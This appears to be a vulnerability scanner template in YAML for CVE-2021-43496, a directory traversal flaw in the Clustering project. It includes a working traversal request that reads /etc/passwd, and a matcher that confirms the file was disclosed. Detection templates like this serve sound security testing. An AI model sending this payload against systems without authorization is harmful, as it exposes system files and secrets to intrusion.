34 lines
1.0 KiB
YAML
34 lines
1.0 KiB
YAML
id: CVE-2021-43496
|
|
|
|
info:
|
|
name: Clustering Local File Inclusion
|
|
author: Evan Rubinstein
|
|
severity: high
|
|
description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
|
|
reference:
|
|
- https://github.com/varun-suresh/Clustering/issues/12
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-43496
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-43496
|
|
cwe-id: CWE-22
|
|
cpe: cpe:2.3:a:clustering_project:clustering:*:*:*:*:*:*:*:*
|
|
epss-score: 0.01272
|
|
tags: cve,cve2021,lfi,clustering
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/img/../../../../../../etc/passwd"
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
# Enhanced by mp on 2022/02/28
|